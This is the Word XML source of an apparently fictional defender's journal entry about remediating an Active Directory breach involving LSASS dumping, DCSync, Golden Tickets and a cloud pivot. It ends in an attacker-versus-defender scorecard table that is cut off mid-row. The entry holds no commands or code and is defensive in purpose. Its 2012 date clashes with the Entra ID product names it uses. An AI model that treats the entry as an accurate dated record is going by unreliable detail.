    <w:p w14:paraId="24779E2E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00000000" w:rsidP="007B3505">
      <w:r>
        <w:pict w14:anchorId="06CDB4C1">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC121F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 15 — 2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304FE6B6" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Defender's Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0452977B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I think... I think we got them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A0879" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The Token-signing certificate rotation completed successfully. All federated sign-ins are working again. I checked the Entra ID sign-in logs for the past four hours: no anomalies, no impossible travel, no SAML token irregularities. The incomplete certificate export the attacker managed to grab is useless — they don't have the full private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73EC0A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I also confirmed: the LSASS dump exfiltration was only 30% complete. Not enough to reliably extract additional credentials. The DNS tunneling was blocked before they got the good stuff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03330CA2" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> beacon is isolated and will be reimaged tomorrow. The FILESERVER01 WMI subscription is gone. The malicious GPOs are deleted. The C2 domains are blocked globally. The </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> has been rotated twice. The Token-signing certificate is new.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587863E3" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I just finished a full audit of every account with administrative rights, DCSync rights, or Entra ID privileged roles. I removed </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> from Group Policy Creator Owners and scheduled it for deletion next week after we verify nothing else depends on it. I found and removed three other overprivileged service accounts that had no business having the rights they did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CEEC9" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I also implemented some permanent hardening:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28814E0B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advanced Audit Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> is now mandatory on all DCs, with quarterly verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BB83E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> runs weekly and alerts on new attack paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7D780" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Honeytoken accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> are deployed across all domains — not just one, but ten, each monitoring different attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A130D16" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GPO change auditing</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> triggers immediate alerts for any new or modified GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9D8B0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entra Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> certificate rotation is now quarterly, automated, and monitored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412AADA8" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync detection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> runs continuously via Splunk, with auto-ticketing for any unauthorized replication access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54D815" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>This attacker taught me more in twelve days than I learned in the previous two years. They showed me every blind spot, every assumption, every "we'll fix that later" that I'd been ignoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF24D22" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The Golden Ticket attack isn't just about stealing the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> hash. It's about understanding that Active Directory isn't just a directory service — it's the trust backbone of the entire organization. When you own the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">, you don't just own accounts. You own the </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>concept of identity</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> within the domain. You can be anyone, access anything, and erase your tracks because the logs show "legitimate" authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85F156" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Detecting Golden Tickets is nearly impossible if you don't have the right logging enabled </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> the attack. Event ID 4769 alone won't save you — you need to look for anomalies in ticket lifetimes, encryption types, impossible users, and behavioral baselines. You need to know what "normal" looks like before you can spot "abnormal."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59883DDE" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">And prevention? That's the real answer. Rotate </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> twice a year. Audit DCSync permissions quarterly. Monitor for phantom users. Use honeytokens. Enable the logging that "generates too much data" because the alternative is flying blind while someone forges tickets in your domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA4E61" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>Did I win? Yes. This time. The attacker is gone — burned their infrastructure, left no active beacons, and lost their foothold. I can see it in the silence. The network is quiet. Too quiet, maybe, but quiet in the way that suggests absence rather than stealth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385DCC2F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But I also know they're not dead. They're just waiting. They have my TTPs now. They know my detection capabilities. They'll come back smarter, quieter, more patient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F04F7" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>And I'll be waiting. With better logging, better detection, better hardening, and a hell of a lot less patience for "legacy compatibility" excuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E1BB3" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The next time someone tries to forge a Golden Ticket in my domain, they're going to find a minefield. And I'll be watching every step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D195CB2" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00000000" w:rsidP="007B3505">
      <w:r>
        <w:pict w14:anchorId="1C9C0B16">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC9AE85" w14:textId="2C6653C3" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r>
        <w:t>FINAL SCORE</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3258"/>
        <w:gridCol w:w="3360"/>
        <w:gridCol w:w="2732"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE6E70" w14:paraId="0AE1D5C4" w14:textId="5E011542" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7986055D" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2588C45C" w14:textId="296C3407" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A995D9D" w14:textId="5877B15B" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="4B0583DA" w14:textId="18A94BAB" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D2799A" w14:textId="7E78F991" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698FC1AA" w14:textId="36ACD006" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="007B3505">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t>Phishing success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C8ADB9" w14:textId="38F87399" w:rsidR="00CE6E70" w:rsidRPr="007B3505" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌No email security alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="56F77AB3" w14:textId="7ABD5A6F" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA02E05" w14:textId="4E7B5FEE" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Credential Harvesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751237E6" w14:textId="648FC073" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="007B3505">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t>LSASS dump, svc-backup compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D43586C" w14:textId="3307BA60" w:rsidR="00CE6E70" w:rsidRPr="007B3505" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌No LSASS protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="546FA8C6" w14:textId="2BA40A11" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2B0083" w14:textId="75116E78" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FBF9979" w14:textId="3C2AA574" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t>WS-ACCT-047</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F22F80E" w14:textId="0BEB0558" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌No lateral movement detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="0C9458CD" w14:textId="0B930EAD" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D6271B" w14:textId="46C78FA1" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t xml:space="preserve">DCSync / </w:t>
            </w:r>
            <w:r w:rsidRPr="000D0F3B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>krbtgt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA73B22" w14:textId="56D15922" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Hash </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE6E70">
              <w:t>extracted successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A6B14E" w14:textId="2322066D" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌No 4662 auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="32B7C940" w14:textId="4CECC87D" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B97766C" w14:textId="3BC38965" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Golden Ticket Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CA6B698" w14:textId="44ACFA29" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>forged tickets created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D4445E" w14:textId="6FD82DD3" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌No phantom user detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="19799EE1" w14:textId="144FA5A4" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D5EBE6" w14:textId="0124F6B2" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Persistence (WMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C7A109" w14:textId="329A8679" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t>Found and removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E922FBC" w14:textId="51465824" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅Discovered via hunt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="229F5602" w14:textId="593E311D" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16395896" w14:textId="1B9C0E0E" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Persistence (GPO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31083328" w14:textId="151AB2D8" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r>
              <w:t>Found and removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41EEFC01" w14:textId="75741EBB" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅Discovered via audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="2E3522E9" w14:textId="08467D5F" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6FB088" w14:textId="4877503D" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Cloud Pivot (Entra ID)</w:t>
            </w:r>
          </w:p>
